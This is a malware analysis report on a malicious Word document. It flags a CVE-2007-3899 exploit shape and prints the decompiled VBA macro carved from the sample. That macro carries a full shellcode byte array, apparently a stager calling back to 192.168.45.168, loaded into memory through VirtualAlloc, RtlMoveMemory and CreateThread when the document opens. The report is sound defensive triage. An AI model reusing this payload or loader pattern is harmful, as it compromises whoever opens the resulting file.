Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d36a5229ca59862a…

MALICIOUS

Office (OLE) / .DOC

36.0 KB Created: 2026-03-19 10:30:00 Authoring application: Microsoft Office Word First seen: 2026-06-09
MD5: ca265c69e41d7972a155d72f32fe4ae4 SHA-1: 123b9a43f9533a2c8af83611f5ecd47265790cd3 SHA-256: d36a5229ca59862adf2401d4ac290c792a399e71e7b574739b3c32230d80a133
164 Risk Score

Heuristics 6

  • CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899
    Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
  • Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
    Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA project contains no executable statements info OLE_VBA_MACROS
    Document contains a VBA project, but extracted modules only contain attributes/options/comments and no executable statements.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15045 bytes
SHA-256: ba65ab1e3a93ad0bbf78553775539e29409e4433d955ccc5941d571eb2469675
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/bf58ec3416d0468bb64c6a62c87fd5d6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 924 bytes
' Macros/VBA/NewMacros - 7378 bytes
' Line #0:
' 	FuncDefn (Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr)
' Line #1:
' Line #2:
' 	FuncDefn (Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr)
' Line #3:
' Line #4:
' 	FuncDefn (Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As , ByVal lLength As Long) As LongPtr)
' Line #5:
' Line #6:
' 	FuncDefn (Function mymacro())
' Line #7:
' 	Dim 
' 	VarDefn buf (As Variant)
' Line #8:
' 	Dim 
' 	VarDefn addr (As LongPtr)
' Line #9:
' 	Dim 
' 	VarDefn counter (As Long)
' Line #10:
' 	Dim 
' 	VarDefn data (As Long)
' Line #11:
' 	Dim 
' 	VarDefn res (As Long)
' Line #12:
' Line #13:
' 	LineCont 0x0020 A6 00 00 00 46 01 00 00 E6 01 00 00 86 02 00 00 26 03 00 00 C6 03 00 00 66 04 00 00 06 05 00 00
' 	LitDI2 0x00FC 
' 	LitDI2 0x00E8 
' 	LitDI2 0x008F 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0060 
' 	LitDI2 0x0031 
' 	LitDI2 0x00D2 
' 	LitDI2 0x0064 
' 	LitDI2 0x008B 
' 	LitDI2 0x0052 
' 	LitDI2 0x0030 
' 	LitDI2 0x008B 
' 	LitDI2 0x0052 
' 	LitDI2 0x000C 
' 	LitDI2 0x0089 
' 	LitDI2 0x00E5 
' 	LitDI2 0x008B 
' 	LitDI2 0x0052 
' 	LitDI2 0x0014 
' 	LitDI2 0x0031 
' 	LitDI2 0x00FF 
' 	LitDI2 0x000F 
' 	LitDI2 0x00B7 
' 	LitDI2 0x004A 
' 	LitDI2 0x0026 
' 	LitDI2 0x008B 
' 	LitDI2 0x0072 
' 	LitDI2 0x0028 
' 	LitDI2 0x0031 
' 	LitDI2 0x00C0 
' 	LitDI2 0x00AC 
' 	LitDI2 0x003C 
' 	LitDI2 0x0061 
' 	LitDI2 0x007C 
' 	LitDI2 0x0002 
' 	LitDI2 0x002C 
' 	LitDI2 0x0020 
' 	LitDI2 0x00C1 
' 	LitDI2 0x00CF 
' 	LitDI2 0x000D 
' 	LitDI2 0x0001 
' 	LitDI2 0x00C7 
' 	LitDI2 0x0049 
' 	LitDI2 0x0075 
' 	LitDI2 0x00EF 
' 	LitDI2 0x0052 
' 	LitDI2 0x008B 
' 	LitDI2 0x0052 
' 	LitDI2 0x0010 
' 	LitDI2 0x008B 
' 	LitDI2 0x0042 
' 	LitDI2 0x003C 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D0 
' 	LitDI2 0x008B 
' 	LitDI2 0x0040 
' 	LitDI2 0x0078 
' 	LitDI2 0x0085 
' 	LitDI2 0x00C0 
' 	LitDI2 0x0057 
' 	LitDI2 0x0074 
' 	LitDI2 0x004C 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D0 
' 	LitDI2 0x008B 
' 	LitDI2 0x0048 
' 	LitDI2 0x0018 
' 	LitDI2 0x0050 
' 	LitDI2 0x008B 
' 	LitDI2 0x0058 
' 	LitDI2 0x0020 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D3 
' 	LitDI2 0x0085 
' 	LitDI2 0x00C9 
' 	LitDI2 0x0074 
' 	LitDI2 0x003C 
' 	LitDI2 0x0049 
' 	LitDI2 0x0031 
' 	LitDI2 0x00FF 
' 	LitDI2 0x008B 
' 	LitDI2 0x0034 
' 	LitDI2 0x008B 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D6 
' 	LitDI2 0x0031 
' 	LitDI2 0x00C0 
' 	LitDI2 0x00C1 
' 	LitDI2 0x00CF 
' 	LitDI2 0x000D 
' 	LitDI2 0x00AC 
' 	LitDI2 0x0001 
' 	LitDI2 0x00C7 
' 	LitDI2 0x0038 
' 	LitDI2 0x00E0 
' 	LitDI2 0x0075 
' 	LitDI2 0x00F4 
' 	LitDI2 0x0003 
' 	LitDI2 0x007D 
' 	LitDI2 0x00F8 
' 	LitDI2 0x003B 
' 	LitDI2 0x007D 
' 	LitDI2 0x0024 
' 	LitDI2 0x0075 
' 	LitDI2 0x00E0 
' 	LitDI2 0x0058 
' 	LitDI2 0x008B 
' 	LitDI2 0x0058 
' 	LitDI2 0x0024 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D3 
' 	LitDI2 0x0066 
' 	LitDI2 0x008B 
' 	LitDI2 0x000C 
' 	LitDI2 0x004B 
' 	LitDI2 0x008B 
' 	LitDI2 0x0058 
' 	LitDI2 0x001C 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D3 
' 	LitDI2 0x008B 
' 	LitDI2 0x0004 
' 	LitDI2 0x008B 
' 	LitDI2 0x0001 
' 	LitDI2 0x00D0 
' 	LitDI2 0x0089 
' 	LitDI2 0x0044 
' 	LitDI2 0x0024 
' 	LitDI2 0x0024 
' 	LitDI2 0x005B 
' 	LitDI2 0x005B 
' 	LitDI2 0x0061 
' 	LitDI2 0x0059 
' 	LitDI2 0x005A 
' 	LitDI2 0x0051 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00E0 
' 	LitDI2 0x0058 
' 	LitDI2 0x005F 
' 	LitDI2 0x005A 
' 	LitDI2 0x008B 
' 	LitDI2 0x0012 
' 	LitDI2 0x00E9 
' 	LitDI2 0x0080 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00FF 
' 	LitDI2 0x005D 
' 	LitDI2 0x0068 
' 	LitDI2 0x006E 
' 	LitDI2 0x0065 
' 	LitDI2 0x0074 
' 	LitDI2 0x0000 
' 	LitDI2 0x0068 
' 	LitDI2 0x0077 
' 	LitDI2 0x0069 
' 	LitDI2 0x006E 
' 	LitDI2 0x0069 
' 	LitDI2 0x0054 
' 	LitDI2 0x0068 
' 	LitDI2 0x004C 
' 	LitDI2 0x0077 
' 	LitDI2 0x0026 
' 	LitDI2 0x0007 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0031 
' 	LitDI2 0x00DB 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x00E8 
' 	LitDI2 0x0070 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x004D 
' 	LitDI2 0x006F 
' 	LitDI2 0x007A 
' 	LitDI2 0x0069 
' 	LitDI2 0x006C 
' 	LitDI2 0x006C 
' 	LitDI2 0x0061 
' 	LitDI2 0x002F 
' 	LitDI2 0x0035 
' 	LitDI2 0x002E 
' 	LitDI2 0x0030 
' 	LitDI2 0x0020 
' 	LitDI2 0x0028 
' 	LitDI2 0x0057 
' 	LitDI2 0x0069 
' 	LitDI2 0x006E 
' 	LitDI2 0x0064 
' 	LitDI2 0x006F 
' 	LitDI2 0x0077 
' 	LitDI2 0x0073 
' 	LitDI2 0x0020 
' 	LitDI2 0x004E 
' 	LitDI2 0x0054 
' 	LitDI2 0x0020 
' 	LitDI2 0x0031 
' 	LitDI2 0x0030 
' 	LitDI2 0x002E 
' 	LitDI2 0x0030 
' 	LitDI2 0x003B 
' 	LitDI2 0x0020 
' 	LitDI2 0x0057 
' 	LitDI2 0x0069 
' 	LitDI2 0x006E 
' 	LitDI2 0x0036 
' 	LitDI2 0x0034 
' 	LitDI2 0x003B 
' 	LitDI2 0x0020 
' 	LitDI2 0x0078 
' 	LitDI2 0x0036 
' 	LitDI2 0x0034 
' 	LitDI2 0x0029 
' 	LitDI2 0x0020 
' 	LitDI2 0x0041 
' 	LitDI2 0x0070 
' 	LitDI2 0x0070 
' 	LitDI2 0x006C 
' 	LitDI2 0x0065 
' 	LitDI2 0x0057 
' 	LitDI2 0x0065 
' 	LitDI2 0x0062 
' 	LitDI2 0x004B 
' 	LitDI2 0x0069 
' 	LitDI2 0x0074 
' 	LitDI2 0x002F 
' 	LitDI2 0x0035 
' 	LitDI2 0x0033 
' 	LitDI2 0x0037 
' 	LitDI2 0x002E 
' 	LitDI2 0x0033 
' 	LitDI2 0x0036 
' 	LitDI2 0x0020 
' 	LitDI2 0x0028 
' 	LitDI2 0x004B 
' 	LitDI2 0x0048 
' 	LitDI2 0x0054 
' 	LitDI2 0x004D 
' 	LitDI2 0x004C 
' 	LitDI2 0x002C 
' 	LitDI2 0x0020 
' 	LitDI2 0x006C 
' 	LitDI2 0x0069 
' 	LitDI2 0x006B 
' 	LitDI2 0x0065 
' 	LitDI2 0x0020 
' 	LitDI2 0x0047 
' 	LitDI2 0x0065 
' 	LitDI2 0x0063 
' 	LitDI2 0x006B 
' 	LitDI2 0x006F 
' 	LitDI2 0x0029 
' 	LitDI2 0x0020 
' 	LitDI2 0x0043 
' 	LitDI2 0x0068 
' 	LitDI2 0x0072 
' 	LitDI2 0x006F 
' 	LitDI2 0x006D 
' 	LitDI2 0x0065 
' 	LitDI2 0x002F 
' 	LitDI2 0x0031 
' 	LitDI2 0x0033 
' 	LitDI2 0x0031 
' 	LitDI2 0x002E 
' 	LitDI2 0x0030 
' 	LitDI2 0x002E 
' 	LitDI2 0x0030 
' 	LitDI2 0x002E 
' 	LitDI2 0x0030 
' 	LitDI2 0x0020 
' 	LitDI2 0x0053 
' 	LitDI2 0x0061 
' 	LitDI2 0x0066 
' 	LitDI2 0x0061 
' 	LitDI2 0x0072 
' 	LitDI2 0x0069 
' 	LitDI2 0x002F 
' 	LitDI2 0x0035 
' 	LitDI2 0x0033 
' 	LitDI2 0x0037 
' 	LitDI2 0x002E 
' 	LitDI2 0x0033 
' 	LitDI2 0x0036 
' 	LitDI2 0x0000 
' 	LitDI2 0x0068 
' 	LitDI2 0x003A 
' 	LitDI2 0x0056 
' 	LitDI2 0x0079 
' 	LitDI2 0x00A7 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x006A 
' 	LitDI2 0x0003 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0068 
' 	LitDI2 0x00BB 
' 	LitDI2 0x0001 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x00E8 
' 	LitDI2 0x0040 
' 	LitDI2 0x0001 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x002F 
' 	LitDI2 0x006B 
' 	LitDI2 0x0041 
' 	LitDI2 0x005F 
' 	LitDI2 0x0051 
' 	LitDI2 0x0043 
' 	LitDI2 0x0046 
' 	LitDI2 0x0059 
' 	LitDI2 0x004C 
' 	LitDI2 0x0069 
' 	LitDI2 0x0049 
' 	LitDI2 0x006B 
' 	LitDI2 0x0074 
' 	LitDI2 0x0065 
' 	LitDI2 0x0069 
' 	LitDI2 0x0078 
' 	LitDI2 0x0037 
' 	LitDI2 0x0052 
' 	LitDI2 0x004D 
' 	LitDI2 0x0048 
' 	LitDI2 0x0068 
' 	LitDI2 0x0042 
' 	LitDI2 0x0051 
' 	LitDI2 0x002D 
' 	LitDI2 0x002D 
' 	LitDI2 0x004E 
' 	LitDI2 0x0070 
' 	LitDI2 0x004F 
' 	LitDI2 0x0034 
' 	LitDI2 0x004D 
' 	LitDI2 0x004D 
' 	LitDI2 0x0066 
' 	LitDI2 0x0057 
' 	LitDI2 0x0071 
' 	LitDI2 0x0057 
' 	LitDI2 0x0069 
' 	LitDI2 0x0036 
' 	LitDI2 0x0031 
' 	LitDI2 0x0079 
' 	LitDI2 0x004D 
' 	LitDI2 0x0034 
' 	LitDI2 0x0058 
' 	LitDI2 0x0051 
' 	LitDI2 0x0039 
' 	LitDI2 0x005F 
' 	LitDI2 0x004E 
' 	LitDI2 0x0052 
' 	LitDI2 0x0057 
' 	LitDI2 0x0068 
' 	LitDI2 0x0076 
' 	LitDI2 0x0046 
' 	LitDI2 0x0063 
' 	LitDI2 0x0030 
' 	LitDI2 0x0074 
' 	LitDI2 0x006B 
' 	LitDI2 0x005F 
' 	LitDI2 0x0079 
' 	LitDI2 0x0032 
' 	LitDI2 0x0049 
' 	LitDI2 0x007A 
' 	LitDI2 0x0042 
' 	LitDI2 0x0030 
' 	LitDI2 0x0063 
' 	LitDI2 0x004D 
' 	LitDI2 0x0071 
' 	LitDI2 0x0043 
' 	LitDI2 0x0067 
' 	LitDI2 0x0066 
' 	LitDI2 0x0033 
' 	LitDI2 0x0068 
' 	LitDI2 0x0036 
' 	LitDI2 0x0036 
' 	LitDI2 0x0059 
' 	LitDI2 0x0049 
' 	LitDI2 0x0038 
' 	LitDI2 0x0050 
' 	LitDI2 0x0064 
' 	LitDI2 0x0058 
' 	LitDI2 0x0077 
' 	LitDI2 0x002D 
' 	LitDI2 0x0046 
' 	LitDI2 0x0064 
' 	LitDI2 0x0037 
' 	LitDI2 0x0039 
' 	LitDI2 0x0053 
' 	LitDI2 0x0079 
' 	LitDI2 0x0043 
' 	LitDI2 0x0037 
' 	LitDI2 0x005F 
' 	LitDI2 0x006E 
' 	LitDI2 0x004A 
' 	LitDI2 0x0046 
' 	LitDI2 0x006E 
' 	LitDI2 0x0045 
' 	LitDI2 0x0079 
' 	LitDI2 0x0037 
' 	LitDI2 0x0041 
' 	LitDI2 0x0064 
' 	LitDI2 0x004F 
' 	LitDI2 0x005F 
' 	LitDI2 0x0076 
' 	LitDI2 0x007A 
' 	LitDI2 0x0036 
' 	LitDI2 0x0055 
' 	LitDI2 0x006E 
' 	LitDI2 0x0033 
' 	LitDI2 0x0050 
' 	LitDI2 0x0039 
' 	LitDI2 0x006B 
' 	LitDI2 0x005F 
' 	LitDI2 0x0051 
' 	LitDI2 0x006E 
' 	LitDI2 0x0053 
' 	LitDI2 0x0070 
' 	LitDI2 0x0079 
' 	LitDI2 0x0064 
' 	LitDI2 0x0059 
' 	LitDI2 0x004B 
' 	LitDI2 0x0050 
' 	LitDI2 0x0047 
' 	LitDI2 0x006B 
' 	LitDI2 0x0043 
' 	LitDI2 0x0031 
' 	LitDI2 0x0055 
' 	LitDI2 0x0066 
' 	LitDI2 0x006A 
' 	LitDI2 0x0065 
' 	LitDI2 0x006B 
' 	LitDI2 0x0047 
' 	LitDI2 0x0076 
' 	LitDI2 0x006E 
' 	LitDI2 0x0043 
' 	LitDI2 0x0063 
' 	LitDI2 0x004D 
' 	LitDI2 0x0066 
' 	LitDI2 0x0079 
' 	LitDI2 0x004A 
' 	LitDI2 0x0057 
' 	LitDI2 0x0079 
' 	LitDI2 0x0079 
' 	LitDI2 0x0043 
' 	LitDI2 0x0044 
' 	LitDI2 0x0061 
' 	LitDI2 0x0058 
' 	LitDI2 0x0033 
' 	LitDI2 0x0039 
' 	LitDI2 0x0075 
' 	LitDI2 0x0032 
' 	LitDI2 0x005F 
' 	LitDI2 0x0044 
' 	LitDI2 0x0066 
' 	LitDI2 0x0036 
' 	LitDI2 0x006E 
' 	LitDI2 0x0064 
' 	LitDI2 0x007A 
' 	LitDI2 0x004F 
' 	LitDI2 0x0053 
' 	LitDI2 0x005F 
' 	LitDI2 0x0063 
' 	LitDI2 0x0034 
' 	LitDI2 0x004E 
' 	LitDI2 0x005F 
' 	LitDI2 0x0070 
' 	LitDI2 0x0059 
' 	LitDI2 0x0044 
' 	LitDI2 0x0079 
' 	LitDI2 0x0046 
' 	LitDI2 0x0036 
' 	LitDI2 0x0035 
' 	LitDI2 0x0071 
' 	LitDI2 0x0061 
' 	LitDI2 0x0062 
' 	LitDI2 0x0045 
' 	LitDI2 0x006D 
' 	LitDI2 0x002D 
' 	LitDI2 0x0042 
' 	LitDI2 0x0000 
' 	LitDI2 0x0050 
' 	LitDI2 0x0068 
' 	LitDI2 0x0057 
' 	LitDI2 0x0089 
' 	LitDI2 0x009F 
' 	LitDI2 0x00C6 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0089 
' 	LitDI2 0x00C6 
' 	LitDI2 0x0053 
' 	LitDI2 0x0068 
' 	LitDI2 0x0000 
' 	LitDI2 0x0032 
' 	LitDI2 0x00E8 
' 	LitDI2 0x0084 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0057 
' 	LitDI2 0x0053 
' 	LitDI2 0x0056 
' 	LitDI2 0x0068 
' 	LitDI2 0x00EB 
' 	LitDI2 0x0055 
' 	LitDI2 0x002E 
' 	LitDI2 0x003B 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0096 
' 	LitDI2 0x006A 
' 	LitDI2 0x000A 
' 	LitDI2 0x005F 
' 	LitDI2 0x0068 
' 	LitDI2 0x0080 
' 	LitDI2 0x0033 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0089 
' 	LitDI2 0x00E0 
' 	LitDI2 0x006A 
' 	LitDI2 0x0004 
' 	LitDI2 0x0050 
' 	LitDI2 0x006A 
' 	LitDI2 0x001F 
' 	LitDI2 0x0056 
' 	LitDI2 0x0068 
' 	LitDI2 0x0075 
' 	LitDI2 0x0046 
' 	LitDI2 0x009E 
' 	LitDI2 0x0086 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0056 
' 	LitDI2 0x0068 
' 	LitDI2 0x002D 
' 	LitDI2 0x0006 
' 	LitDI2 0x0018 
' 	LitDI2 0x007B 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0085 
' 	LitDI2 0x00C0 
' 	LitDI2 0x0075 
' 	LitDI2 0x0014 
' 	LitDI2 0x0068 
' 	LitDI2 0x0088 
' 	LitDI2 0x0013 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0068 
' 	LitDI2 0x0044 
' 	LitDI2 0x00F0 
' 	LitDI2 0x0035 
' 	LitDI2 0x00E0 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x004F 
' 	LitDI2 0x0075 
' 	LitDI2 0x00CD 
' 	LitDI2 0x00E8 
' 	LitDI2 0x004B 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x006A 
' 	LitDI2 0x0040 
' 	LitDI2 0x0068 
' 	LitDI2 0x0000 
' 	LitDI2 0x0010 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0068 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0040 
' 	LitDI2 0x0000 
' 	LitDI2 0x0053 
' 	LitDI2 0x0068 
' 	LitDI2 0x0058 
' 	LitDI2 0x00A4 
' 	LitDI2 0x0053 
' 	LitDI2 0x00E5 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0093 
' 	LitDI2 0x0053 
' 	LitDI2 0x0053 
' 	LitDI2 0x0089 
' 	LitDI2 0x00E7 
' 	LitDI2 0x0057 
' 	LitDI2 0x0068 
' 	LitDI2 0x0000 
' 	LitDI2 0x0020 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0053 
' 	LitDI2 0x0056 
' 	LitDI2 0x0068 
' 	LitDI2 0x0012 
' 	LitDI2 0x0096 
' 	LitDI2 0x0089 
' 	LitDI2 0x00E2 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x0085 
' 	LitDI2 0x00C0 
' 	LitDI2 0x0074 
' 	LitDI2 0x00CF 
' 	LitDI2 0x008B 
' 	LitDI2 0x0007 
' 	LitDI2 0x0001 
' 	LitDI2 0x00C3 
' 	LitDI2 0x0085 
' 	LitDI2 0x00C0 
' 	LitDI2 0x0075 
' 	LitDI2 0x00E5 
' 	LitDI2 0x0058 
' 	LitDI2 0x00C3 
' 	LitDI2 0x005F 
' 	LitDI2 0x00E8 
' 	LitDI2 0x006B 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00FF 
' 	LitDI2 0x0031 
' 	LitDI2 0x0039 
' 	LitDI2 0x0032 
' 	LitDI2 0x002E 
' 	LitDI2 0x0031 
' 	LitDI2 0x0036 
' 	LitDI2 0x0038 
' 	LitDI2 0x002E 
' 	LitDI2 0x0034 
' 	LitDI2 0x0035 
' 	LitDI2 0x002E 
' 	LitDI2 0x0031 
' 	LitDI2 0x0036 
' 	LitDI2 0x0038 
' 	LitDI2 0x0000 
' 	LitDI2 0x00BB 
' 	LitDI2 0x00E0 
' 	LitDI2 0x001D 
' 	LitDI2 0x002A 
' 	LitDI2 0x000A 
' 	LitDI2 0x0068 
' 	LitDI2 0x00A6 
' 	LitDI2 0x0095 
' 	LitDI2 0x00BD 
' 	LitDI2 0x009D 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	LitDI2 0x003C 
' 	LitDI2 0x0006 
' 	LitDI2 0x007C 
' 	LitDI2 0x000A 
' 	LitDI2 0x0080 
' 	LitDI2 0x00FB 
' 	LitDI2 0x00E0 
' 	LitDI2 0x0075 
' 	LitDI2 0x0005 
' 	LitDI2 0x00BB 
' 	LitDI2 0x0047 
' 	LitDI2 0x0013 
' 	LitDI2 0x0072 
' 	LitDI2 0x006F 
' 	LitDI2 0x006A 
' 	LitDI2 0x0000 
' 	LitDI2 0x0053 
' 	LitDI2 0x00FF 
' 	LitDI2 0x00D5 
' 	ArgsArray Array 0x02AF 
' 	St buf 
' Line #14:
' Line #15:
' Line #16:
' 	LitDI2 0x0000 
' 	Ld buf 
' 	FnUBound 0x0000 
' 	LitHI2 0x3000 
' 	LitHI2 0x0040 
' 	ArgsLd VirtualAlloc 0x0004 
' 	St addr 
' Line #17:
' 	StartForVariable 
' 	Ld counter 
' 	EndForVariable 
' 	Ld buf 
' 	FnLBound 0x0000 
' 	Ld buf 
' 	FnUBound 0x0000 
' 	For 
' Line #18:
' 	Ld counter 
' 	ArgsLd buf 0x0001 
' 	St data 
' Line #19:
' 	Ld addr 
' 	Ld counter 
' 	Add 
' 	Ld data 
' 	LitDI2 0x0001 
' 	ArgsLd RtlMoveMemory 0x0003 
' 	St res 
' Line #20:
' 	StartForVariable 
' 	Ld counter 
' 	EndForVariable 
' 	NextVar 
' Line #21:
' Line #22:
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	Ld addr 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsLd CreateThread 0x0006 
' 	St res 
' Line #23:
' 	EndFunc 
' Line #24:
' Line #25:
' 	FuncDefn (Sub Document_Open())
' Line #26:
' 	ArgsCall mymacro 0x0000 
' Line #27:
' 	EndSub 
' Line #28:
' Line #29:
' 	FuncDefn (Sub AutoOpen())
' Line #30:
' 	ArgsCall mymacro 0x0000 
' Line #31:
' 	EndSub 
' Line #32:

Open this report in the interactive analyzer, or submit your own file for analysis.